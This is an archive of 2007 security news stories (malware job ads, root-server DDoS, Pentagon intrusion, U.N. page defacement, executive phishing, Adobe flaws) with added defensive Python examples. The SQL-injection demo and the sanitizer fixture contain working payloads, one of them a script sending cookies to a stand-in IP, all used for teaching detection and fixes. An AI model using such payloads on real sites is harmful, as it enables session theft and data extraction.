Archive for November, 2007

Hackers Fake Job Ads to Steal Corporate, Government Data

November 3, 2007

Hackers stole information from the U.S. Department of Transportation and several U.S. corporations by luring employees with fake job listings placed in online ads and e-mail, a computer security firm said on Monday.

The list of victims included several companies known for providing security services to government agencies.

They include consulting firm Booz Allen, computer services company Unisys Corp. (UIS), computer maker Hewlett-Packard Co. (HPQ) and satellite network provider Hughes Network Systems, a unit of Hughes Communications Inc. (HUGH), said Mel Morris, chief executive of British Internet security provider Prevx Ltd.

Hewlett-Packard declined comment, while officials with other companies couldn’t be reached for comment. A Department of Transportation spokeswoman said the agency couldn’t find any indication of a security breach.

The malicious programs passed otherwise sophisticated security systems undetected because the antivirus software had no signatures for them and so had never been told they were dangerous. The hackers also targeted only a limited group of personal computers, which kept traffic volumes low and let them stay under the radar of the security teams and tools that tend to identify a threat only once its activity reaches a certain level.

“What is most worrying is that this particular sample of malware wasn’t recognized by existing antivirus software. It was able to slip through enterprise defenses,” said Yankee Group security analyst Andrew Jaquith, who learned of the breach from Morris.

It was not clear whether the hackers used information stolen from the personal computers, Morris said.

Internet security firms began to release detection updates to fight the malicious software on Monday night.

Trend Micro, for example, has sent its customers software that prevents the malware from being installed on computers. It also blocks browsers from going to Web sites that the company has identified as being infected with the dangerous programs, said company spokesman Mike Haro.

“This is a serious threat. It shows how sophisticated hackers have become,” Haro said.

A piece of software, NTOS.exe, probes the PC for confidential data, then sends it to a Web site hosted on Yahoo Inc. (YHOO). That site’s owner is likely unaware that it is being used by hackers, Morris said.

That Web site hosts data that had been stolen from more than 1,000 PCs and encrypted before it was posted on the site, according to Morris.

He said that he believes the hackers have set up several “sister” Web sites that are collecting similar data.

Hackers Attack Key Internet Traffic Computers

November 3, 2007

Hackers briefly overwhelmed at least two of the 13 computers that help manage global computer traffic Tuesday in one of the most significant attacks against the Internet since 2002.

Experts said the unusually powerful attacks, which were also noticed on three more of the 13 “root servers,” lasted as long as 12 hours but passed largely unnoticed by most computer users, a testament to the resiliency of the Internet.

[The attacks appear to have been distributed denial-of-service attacks, in which countless computers bombard servers with bogus "handshake" requests, essentially forcing the servers to waste time and energy trying to respond to machines that don't exist.]
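As an added illustration, not part of the original article, the Python below models the server-side effect the bracketed note describes: every forged SYN makes the server allocate connection state and send a SYN/ACK that no real host will ever answer, so half-open connections pile up. The sample traffic, the forged addresses and the threshold of 100 half-open connections are all constructed for this example.

```python
"""Half-open (embryonic) connection accounting as a SYN-flood indicator.

Added example, not from the article. Input is a constructed list of TCP
segments seen from clients, as (src_ip, src_port, flags), in wire order.
"""
from collections import Counter


def half_open_connections(segments):
    """Return the (src_ip, src_port) pairs that sent a SYN but never sent the
    final ACK of the handshake (or a RST/FIN that would release the state)."""
    pending = set()
    for src_ip, src_port, flags in segments:
        key = (src_ip, src_port)
        if flags == "S":            # client SYN: server now holds embryonic state
            pending.add(key)
        elif flags in ("A", "R", "F"):  # handshake completed or torn down
            pending.discard(key)
    return pending


def syn_flood_indicator(segments, max_half_open=100):
    """Summarise the backlog. Forged sources defeat per-IP rate limits, so the
    decision is made on the total backlog, not on any single source."""
    pending = half_open_connections(segments)
    per_source = Counter(ip for ip, _ in pending)
    return {
        "half_open": len(pending),
        "distinct_sources": len(per_source),
        "max_from_one_source": max(per_source.values(), default=0),
        "flood": len(pending) >= max_half_open,
    }


def legit_client(ip, port):
    """A real client: SYN, then the ACK that completes the three-way handshake."""
    return [(ip, port, "S"), (ip, port, "A")]


def spoofed_syns(count):
    """count SYNs from distinct forged addresses; none of them will ever ACK
    because the SYN/ACK goes to a machine that does not exist."""
    return [
        (f"10.{(i >> 8) & 255}.{i & 255}.{(i * 7) & 255}", 40000 + i, "S")
        for i in range(count)
    ]


# Constructed traffic: a couple of real clients, then a burst of forged SYNs.
NORMAL_TRAFFIC = legit_client("192.0.2.10", 51000) + legit_client("192.0.2.11", 51001)
ATTACK_TRAFFIC = NORMAL_TRAFFIC + spoofed_syns(500)

if __name__ == "__main__":
    print("normal:", syn_flood_indicator(NORMAL_TRAFFIC))
    print("attack:", syn_flood_indicator(ATTACK_TRAFFIC))
```

Real defenses such as SYN cookies avoid holding the state at all; this accounting only shows why an unprotected server saturates under a modest number of forged requests, and why per-source counting alone (max_from_one_source stays at 1) would miss the attack.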

Behind the scenes, computer scientists worldwide raced to cope with enormous volumes of data that threatened to saturate some of the Internet’s most vital pipelines.

The motive for the attacks was unclear, said Duane Wessels, a researcher at the Cooperative Association for Internet Data Analysis at the San Diego Supercomputing Center.

“Maybe to show off or just be disruptive; it doesn’t seem to be extortion or anything like that,” Wessels said.

Other experts said the hackers appeared to disguise their origin, but vast amounts of rogue data in the attacks were traced to South Korea.

The attacks seemed partly designed to test the resiliency of servers operated by UltraDNS, a company that operates servers managing traffic for some Web sites ending in “.org” and some other suffixes, experts said.

Officials with NeuStar Inc. (NSR), which owns UltraDNS, confirmed only that it had observed an unusual increase in traffic.

Among the targeted “root” servers that manage global Internet traffic were ones operated by the Defense Department and the Internet Corporation for Assigned Names and Numbers, the Internet’s primary oversight body.

[The DoD and ICANN servers, the "G" and "L" machines, respectively, appear to have been swamped by the load, while three anycast servers, "F," "I" and "M," which distribute their tasks to many machines worldwide, fared much better.]

“There was what appears to be some form of attack during the night hours here in California and into the morning,” said John Crain, chief technical officer for the Internet Corporation for Assigned Names and Numbers. He said the attack was continuing and so was the hunt for its origin.

“I don’t think anybody has the full picture,” Crain said. “We’re looking at the data.”

Crain said Tuesday’s attack was less serious than attacks against the same 13 “root” servers in October 2002 because technology innovations in recent years have increasingly distributed their workloads to other computers around the globe.

Pentagon Cyber Attack Forces 1,500 PCs Off Line

November 3, 2007

As many as 1,500 computers in the Defense Department were taken off line because of a cyber attack, Pentagon officials said.

Defense Secretary Robert Gates says he expects systems will recover soon after Wednesday’s attack.

Gates said the Pentagon sees hundreds of attacks a day, and this one had no adverse impact on department operations. Employees whose computers were affected could still use their handheld BlackBerries.

The attack came days after agencies within the Department of Homeland Security acknowledged that staffers had been attacked more than 800 times in the past two years.


During a press briefing Gates said of the Pentagon cyber attacks: “We obviously have redundant systems in place. … There will be some administrative disruptions and personal inconveniences.”

He said the Pentagon shut the computers down when a penetration of the system was detected, and the cause is still being investigated.

When asked if his own e-mail account was affected, Gates said: “I don’t do e-mail. I’m a very low-tech person.”

Navy Lt. Cmdr. Chito Peppler, a Pentagon spokesman, said Defense Department systems are probed every day by a wide variety of attacks.

“The nature of the threat is large and diverse, and includes recreational hackers, self-styled cyber-vigilantes, various groups with nationalistic or ideological agendas, transnational actors and nation-states,” Peppler said.

Experts: Russians Planning New Cyberattack

November 3, 2007

A resurgence of malware activity in Russia has caught the eye of security vendors.

Recently, researchers at Trend Micro have found a Russian server hosting some 400 pieces of malware that may be part of a forthcoming large-scale attack, while at least one other vendor reported that the country has quickly moved back up on the list of purveyors of Web-based malware.

Paul Ferguson, network architect at Trend Micro, in Cupertino, Calif., said the company ran across the server, which had a “cornucopia of new malware,” the week of July 23.

During an investigation, researchers found there were Web sites with malicious iFrames proxying requests for the malware. The Web sites all had Italian-sounding names and Italian content, but actually resided in a hosting facility in Germany, he said.

An iFrame (inline frame) is an HTML element that embeds another HTML document, which may come from a different site, inside the main document. An iFrame that is a pixel or two in size or hidden with CSS loads the attacker’s page without the visitor ever seeing it, which is why it is a favored way to plant drive-by exploit code on a compromised site.

In this case, the iFrames are believed to have been deliberately inserted by the owners of the Web sites to snare unsuspecting visitors as part of a porn-for-pay scam, Ferguson said.
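The following Python is an added example, not code from the article or from Trend Micro: the check a site owner or a scanner would run over fetched HTML to find the kind of iFrame described above, one pointing at a host other than the page’s own or shrunk and hidden so that visitors never notice it. The sample page, the Italian text and the addresses in it are constructed (documentation address ranges), not the real sites involved.

```python
"""Find injected or hidden iframes in a page's HTML (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for width/height values of 0-2 pixels, e.g. '0', '1', '1px'."""
    digits = value.strip().lower()
    if digits.endswith("px"):
        digits = digits[:-2]
    return digits.isdigit() and int(digits) <= 2


def _is_hidden(attrs):
    """Hidden via inline CSS, or sized so small it cannot be seen."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    return _is_tiny(attrs.get("width", "")) or _is_tiny(attrs.get("height", ""))


def suspicious_iframes(html, page_host):
    """Return [(src, [reasons])] for iframes that are offsite and/or hidden.
    A relative src resolves to the page's own host and is not 'offsite'."""
    collector = IframeCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or page_host).lower()
        reasons = []
        if host != page_host.lower():
            reasons.append("offsite src: " + host)
        if _is_hidden(attrs):
            reasons.append("hidden or near-zero size")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed page: a legitimate same-site player plus an injected 1x1 iframe.
SAMPLE_HTML = """
<html><body>
<h1>Benvenuti</h1>
<iframe src="/player?id=42" width="480" height="360"></iframe>
<p>Contenuti gratis...</p>
<iframe src="http://198.51.100.23/in.cgi?3" width=1 height=1 style="display: none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_HTML, "www.example.it"):
        print(src, "->", "; ".join(reasons))
```

The offsite test is the weaker of the two signals (ad networks and video hosts are offsite too), so in practice the findings feed a review queue or an allowlist of known embed hosts rather than an automatic block.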

“Looking at these massive samples of malware, we can’t help [but] think that there’s something brewing in Russia,” wrote researcher Carolyn Guevarra in a blog posting on Trend Micro’s Web site. “We have just seen these cyber-criminals pull the Italian Job recently.”

The operation dubbed “the Italian Job” by Trend Micro researchers involved some 10,000 Web sites with malicious code that redirected visitors to a server booby-trapped with drive-by exploits. The attack used Italian Web sites more than others.

Researchers at Sophos, headquartered in Abingdon, England, have also reported a rise in Web-based malware from Russia. The company’s experts noted in a report about the top 10 Web and e-mail-borne threats for July 2007 that the share of malware-infected Web pages hosted in Russia had increased substantially between June and July, jumping from 3.5 to 14.7 percent.

“This can be explained by the large number of Mal/iFrame and Mal/ObfJS-infected Web pages in Russia that have been compromised to serve as drive-by sites,” the report said.

The Sophos report put China at the top of the list with 49.8 percent and the United States in second place with 21.8 percent.

Malware numbers are growing rapidly, in particular adware, spyware and stealthy, targeted attacks, according to officials at McAfee, headquartered in Santa Clara, Calif.

In 2000, McAfee Avert Labs counted about 50,000 unique malicious items. That jumped to 100,000 in 2003, and in August 2006, the 200,000 mark was reached.

McAfee officials said they expect to see the 300,000th unique piece of malicious software, such as worms, viruses or Trojans, this week.

“This statistic underscores how the malware market has shifted from fame to fortune,” said Dave Marcus, security research and communications manager for McAfee Avert Labs. “Bots, adware, spyware and other attacks make up an over $100 billion global market for cyber-crime — surpassing drug trafficking as a global issue from a monetary perspective.”

U.N. Secretary-General’s Web Page Hacked

November 3, 2007

The United Nations reviewed the security procedures on its Web site Monday after a group of hackers posted anti-Israeli messages on the personal page of Secretary-General Ban Ki-moon.

A page that usually features Ban’s speeches instead displayed on Sunday messages which read: “Hey Ysrail and Usa dont [sic] kill children and other people Peace for ever No war.”

The messages, apparently written by a group of hackers who go by the name CyberProtest, were posted in the early hours of Sunday, but had been removed by 9:15 a.m. EDT, a U.N. spokesman said.

“We are very concerned that this happened and we are investigating,” the spokesman said. “We will make security changes to prevent this from happening again.”

The messages were prefaced by the words “Hacked By Keremy 125 M0sted And Gsy That Is CyberProtest,” a reference to a group of hackers — one of whom is Turkish — who have previously been associated with attacks on high-profile Web sites.

On Monday, a Web site run by one of the group, M0sted, had links to a number of other CyberProtest attacks, including on the sites of the carmakers Toyota and Nissan as well as Harvard University.

“M0sted” said that CyberProtest’s objective was to spread the message “that the powerful have no right to oppress the powerless.”

The Web site of another CyberProtest member, “Eno7,” who described him or herself as an “IT security expert,” said that the group had been founded in response to the Israeli military offensive against Lebanon last year.

“The chief architects of this protest are myself, Eno7 from Turkey, and the byond hackers team from Chile. We expanded our efforts as nine other countries joined us afterwards,” it said.

CyberProtest did not intend to disrupt the operation of its victims’ Web sites, “only to give a message against war,” Eno7 said.

Security experts said today that the attack was most likely conducted using SQL injection, in which an attacker places SQL fragments in input the site does not treat as hostile, such as a URL parameter, and the site’s code concatenates that input into a database query, so the attacker’s text runs as part of the query. Depending on the permissions of the database account the site uses, that can expose data or alter the content the site serves, all while pages are being requested normally.

“It needn’t be a part of the site that allows visitors to interact with it — like a comments page,” Steve Moyle, founder and chief technology officer of Secerno, a security firm, said. “Even in a ‘read only’ section, a hacker can issue a command that forces the database to issue information, and [when] they find that vulnerability, an attacker can gain full control of the site.”
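An added example of the point Moyle makes, not the U.N. site’s code (which is not public) and not Secerno’s: a page that only displays content still takes a request parameter and puts it in a query, and if the parameter is pasted in as text it carries the attacker’s SQL. The schema, rows and the placeholder hash value are constructed for the example.

```python
"""SQL injection through a 'read-only' page parameter, and the fix.

Added example, not from the article. Uses sqlite3 from the standard
library as a stand-in for the site's content database.
"""
import sqlite3

# What an attacker would put in ?id= : the leading 0 matches no page, so the
# only rows returned are the ones the UNION pulls from a table the page was
# never meant to touch.
PAYLOAD = "0 UNION SELECT username, password_hash FROM admins"


def setup_db():
    """In-memory database with constructed content and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admins(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO pages VALUES(1, 'Climate change', 'Remarks on climate change...');
        INSERT INTO pages VALUES(2, 'Darfur', 'On the hybrid peacekeeping force...');
        INSERT INTO admins VALUES(1, 'webmaster', 'constructed-hash-value');
    """)
    return conn


def show_page_vulnerable(conn, page_id):
    """Typical 2007-era code: the URL parameter ?id=... is pasted into the SQL.
    No form or comment box is needed; a GET parameter is the entry point."""
    sql = "SELECT title, body FROM pages WHERE id = " + page_id
    return conn.execute(sql).fetchall()


def show_page_fixed(conn, page_id):
    """Validate the parameter's type, then bind it. The driver sends the value
    separately from the statement, so its text can never become SQL."""
    if not page_id.isdigit():
        raise ValueError("page id must be a positive integer")
    return conn.execute(
        "SELECT title, body FROM pages WHERE id = ?", (int(page_id),)
    ).fetchall()


if __name__ == "__main__":
    db = setup_db()
    print("normal:  ", show_page_vulnerable(db, "1"))
    print("injected:", show_page_vulnerable(db, PAYLOAD))  # leaks the admins table
    print("fixed:   ", show_page_fixed(db, "1"))
```

sqlite3’s execute() refuses more than one statement per call, so this shows only the data-extraction half of the problem. On database servers that accept batched statements, the same concatenation also accepts a trailing UPDATE against the pages table, which is how a defaced page results. Running the site’s database account with read-only rights limits the second outcome even when the first bug is present.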

Among the other sites to have allegedly been hacked by CyberProtest are those of Nestle, the University of California and the Norfolk and Norwich University Hospital in England.

By Monday the Secretary-General’s page had been restored to show extracts of speeches on climate change as well as on the adoption of a hybrid peace-keeping force in Darfur.

Criminals Follow Ordinary Citizens Onto Internet

November 3, 2007

As more people turn to Web applications for everyday tasks like e-mail, friendship and payments, cyber criminals are following them in search of bank account details and other valuable data, security researchers said.

Users of Yahoo Inc.’s (YHOO) e-mail service, Google Inc.’s (GOOG) Orkut social networking site and eBay Inc.’s (EBAY) PayPal online payment service were among the targets of attacks in recent weeks. All three companies have acknowledged and plugged the security holes.

The attacks come as Microsoft Corp. (MSFT), whose Windows operating system runs about 90 percent of the world’s computers, has plugged many of the most easily exploited holes in its e-mail program, browser and other products following dozens of embarrassing breaches over the past several years.

FBI Investigating ‘Hit Man’ E-Mail Scheme

November 2, 2007

Dentists, doctors, lawyers and other professionals in the Pittsburgh area have been targeted by a “hit man” e-mail scheme, receiving messages that tell them to pay up to keep their lives, the FBI said.

The e-mail, which was sent to most recipients around Christmas, tells the reader that there is a contract out on his life, generally for $50,000. It says that if the recipient sends the “hit man” more money than that — generally ranging from $80,000 to $150,000 — the hit man will leave him alone.

No one has reportedly lost money or been harmed in the scam, but some recipients were unnerved by the messages, said Special Agent Bill Shore, who supervises the computer crime squad in the Pittsburgh FBI office.

“You think, ‘What did I get into? What do I gotta do to get out of this?’” Shore said.

The FBI became aware of the scam when people in Atlanta and New Orleans received similar e-mail in early December, Shore said. The scheme seems to have originated in Russia.

Online Videos Could Infect Computers With Viruses, Study Finds

November 2, 2007

Online videos aren’t just for bloopers and rants — some might also be conduits for malicious code that can infect your computer.

As anti-spam technology improves, hackers are finding new vehicles to deliver their malicious code. And some could be embedded in online video players, according to a report on Internet threats released Tuesday by the Georgia Tech Information Security Center as it holds its annual summit.

The summit is gathering more than 300 scholars and security experts to discuss emerging threats for 2008 — and their countermeasures.

Among their biggest foes are the ever-changing vehicles that hackers use to deliver “malware,” which can silently install viruses, probe for confidential info or even hijack a computer.

“Just as we see an evolution in messaging, we also see an evolution in threats,” said Chris Rouland, the chief technology officer for IBM Corp.’s Internet Security Systems unit and a member of the group that helped draft the report. “As companies have gotten better blocking e-mails, we see people move to more creative techniques.”

With computer users getting wiser to e-mail scams, malicious hackers are looking for sneakier ways to spread the codes.

Over the past few years, hackers have moved from sending their spam in text-based messages to more devious means, embedding them in images or disguised as Portable Document Format, or PDF, files.

“The next logical step seems to be the media players,” Rouland said.

There have only been a few cases of video-related hacking so far.

One worm discovered in November 2006 opens a malicious Web site without prompting after a user opens a media file in a player. Another program silently installs spyware when a video file is opened. Attackers have also tried to spread fake video links via postings on YouTube.

That reflects the lowered guard many computer users would have on such popular forums.

“People are accustomed to not clicking on messages from banks, but they all want to see videos from YouTube,” Rouland said.

Another soft spot involves social networking sites, blogs and wikis. These community-focused sites, which are driving the next generation of Web applications, are also becoming one of the juiciest targets for malicious hackers.

Browsers visiting these sites silently exchange data with the Web application in the background. Because the sites let anyone edit or post content, an attacker can embed script in a page, and every other visitor’s browser will execute that script when it renders the page, with no indication to the user.

These chinks in the armor could let hackers steal private data, hijack Web transactions or spy on users.
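What makes the embedded script run is that the site stores whatever an editor submits and later sends it, unchanged, to everyone else. The Python below is an added example, not code from any site named in the article: an allowlist sanitizer for wiki or comment submissions, applied to a constructed malicious edit. The tag, attribute and URL-scheme lists are choices made for this example.

```python
"""Allowlist sanitizer for user-submitted wiki or comment HTML (added example).

Rebuilds the submission from scratch: a few formatting tags survive, every
other tag is dropped (script, iframe, object, img), event-handler attributes
and javascript: links are removed, and all text is escaped.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}
RAW_TEXT_TAGS = {"script", "style"}  # their text content is dropped, not escaped


def _safe_href(value):
    # Browsers ignore tabs/newlines inside a scheme ("java\nscript:"), so strip
    # whitespace before deciding. A scheme-less value is a relative link: fine.
    compact = "".join(ch for ch in value if not ch.isspace())
    scheme = urlparse(compact).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class WikiSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skipping = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag in RAW_TEXT_TAGS:
            self.skipping += 1
            return
        if tag not in ALLOWED_TAGS:
            return  # dangerous/unknown tag dropped; its visible text is kept
        kept = []
        for name, value in attrs:
            name = name.lower()
            value = value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # event handlers and unlisted attributes never survive
            if name == "href" and not _safe_href(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        tag = tag.lower()
        if tag in RAW_TEXT_TAGS:
            self.skipping = max(0, self.skipping - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))


def sanitize(submitted_html):
    s = WikiSanitizer()
    s.feed(submitted_html)
    s.close()
    return "".join(s.out)


# Constructed malicious edit: useful-looking text plus four payload variants.
MALICIOUS_EDIT = (
    "<p>Useful edit</p>"
    "<script>document.location='http://203.0.113.9/c?'+document.cookie</script>"
    '<iframe src="http://203.0.113.9/x" width=0 height=0></iframe>'
    '<a href="javascript:alert(1)" onmouseover="steal()">link</a>'
    "<img src=x onerror=alert(1)>"
)

if __name__ == "__main__":
    print(sanitize(MALICIOUS_EDIT))  # <p>Useful edit</p><a>link</a>
```

Sanitize on the way in and escape on the way out; the two are not alternatives, and the second catches content that reached the database by some path other than the edit form.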

Tuesday’s forum gathers experts from around the globe to “try to get ahead of emerging threats rather than having to chase them,” said Mustaque Ahamad, director of the Georgia Tech center.

They are expected to discuss new countermeasures, including tighter validation standards and programs that analyze malicious code. Ahamad also hopes the summit will be a launching pad of sorts for an informal network of security-minded programmers.


Bogus E-Mails Target Top Corporate Executives

November 2, 2007

During a two-hour period on June 24, something unusual and a bit worrying turned up in e-mail security firm MessageLabs Inc.’s filters: 514 messages tailored to senior executives of corporate clients that contained malicious programs designed to steal sensitive company data.

On Sept. 12 and 13 it happened again, but this time the firm captured 1,100 messages in a 16-hour wave.

The messages, which included executives’ names and titles, were from a purported employment service and offered attachments supposedly containing information on potential job candidates.

The attachments were Microsoft Word documents — a common file type erroneously believed to be safe by most computer users — that if not intercepted would have deposited Trojan horses, or malicious programs disguised as benign ones, onto targeted computers.

The two e-mail bursts point to a new and sophisticated take on an old-style attack with troubling implications for corporations, MessageLabs says.

In the past, most e-mail attacks of this kind have been comparably simple “phishing” scams sent to masses of consumers with the goal of inducing them to part with their financial-account information.

A small number of targeted attacks have been seen by security firms, but they typically targeted individuals in government or the military.

These new attacks, however, suggested that a fairly low-tech e-mail scheme could begin to create a high-class problem for significant numbers of companies, one in which valuable data are at risk and technical defenses are hard to make foolproof.

MessageLabs says that it has been intercepting targeted e-mail attacks on corporate clients for at least three years but that the numbers began to climb significantly only over the last year.

The firm was catching one message a day as of the end of 2006. That number rose to about 10 a day by May and then jumped dramatically with the June and September attacks. Both of those incidents targeted executives in a wide range of industries.

“All of a sudden somebody new hit the scene,” said Mark Sunner, MessageLabs’ chief security analyst.

Who that was isn’t clear because technical tricks disguised the e-mails’ origin, he said. But it’s likely the person or group responsible came from the digital underground centered in Eastern Europe, where malicious-program writers and organized crime have long worked hand-in-hand online to steal and sell data for use in fraud schemes.

The newcomers appear to be after corporate secrets, he said.

They have sought, specifically, to infiltrate the computers of chief executives, chief financial officers, chief technology officers and other senior managers — and on occasion their assistants. And the Trojan horses were primarily designed to help the attacker gather Microsoft Office files from the “My Documents” directory of infiltrated PCs.

The people targeted “are the custodians of the company’s secrets,” Sunner said, and have computers full of juicy spreadsheets, financial reports, merger details and trade secrets.

“Why would somebody be targeting a CEO?” asks Scott O’Neal, chief of the Federal Bureau of Investigation’s cyber-intrusion section. “It may be to steal intellectual property, it may be corporate espionage, it may be to get into the database.”

Attacks of this kind have become much simpler, O’Neal said. “The how-to tutorials out there are getting better and better. And people need less and less technical skills.”

But unfortunately, few are reported to law enforcement because companies fear an investigation will disrupt their businesses and result in unwanted publicity. Such fears are unfounded, he said. The agency is careful not to be disruptive and maintains strict confidentiality.

In the recent attacks seen by MessageLabs, the attackers tried to improve the chances executives would open the Trojan-laced attachments by referencing bogus business matters and including personal details, such as name and title, which suggests the attackers spent time researching their targets.

Adobe: Acrobat, Acrobat Reader Have Security Holes

November 2, 2007

Adobe Systems Inc. (ADBE), whose software is used by millions of people to read documents sent over the Internet, said on Wednesday some of its programs contain yet-to-be-fixed flaws that make computers vulnerable to attack.

On October 5, Adobe posted a notice on its Web site that said it had unknowingly incorporated vulnerabilities into versions of Adobe Reader and Acrobat software that could allow malicious programs to get on to a PC without the user’s knowledge.

Such malicious software can take control of a machine and steal confidential data, send out tens of thousands of spam e-mails, or infiltrate government computer systems.

Adobe said it believes the flaws only affect computers running Microsoft Corp’s (MSFT) Windows XP operating system and Internet Explorer 7 Web browser. Adobe said it was working to rectify the problem but the fix might not be available until the end of October.

Some security experts say that may not be soon enough to stop hackers determined to get malicious software past firewalls and other security software programs.

“Users should pressure Adobe to release a patch sooner than that,” said Gadi Evron, a security expert at Beyond Security. He has organized three closed-door international conferences on efforts by governments and private companies to fight computer attacks.

Malicious software is a common problem. Recent examples have corrupted eBay Inc’s (EBAY) Skype Internet telephone service and Time Warner Inc’s (TWX) AOL instant messaging software.

Hackers sometimes hide malicious software inside Microsoft Word documents and photo files, hobbling computers when users open them.

Some security experts said that what makes the Adobe case disturbing is that it came to light before the company had a solution to fix the problem, which means hackers have an opportunity to exploit the situation.

The software maker would have preferred to hold off on notifying the public of the flaws in Acrobat and Reader until the updated software was ready, said John Landwehr, Adobe’s director of security solutions and strategy.

Earlier on Tuesday, Adobe disclosed “critical problems” in versions of three design programs, GoLive, Illustrator and Pagemaker, and simultaneously released software to repair the problems.

“That is the standard practice,” Landwehr told Reuters. “There is a protocol that is fairly well understood.”

But, Landwehr said, in the case of Acrobat and Reader, Adobe had to report the problem before the fix because it was reported on October 5 on security Web site www.heise-security.co.uk. Adobe disclosed it later that day on its own Web site.

Adobe has posted instructions on its Web site for working around the problem, www.adobe.com/support/security/.

But Landwehr said the instructions are mainly for administrators who run corporate networks, not consumers.

Adobe said PC users who cannot apply that workaround themselves may need to wait until the software itself is fixed. The company said it would notify users on its Web site.

Rival browsers Firefox, www.firefox.com, and Opera, www.opera.com, have not reported any similar problems.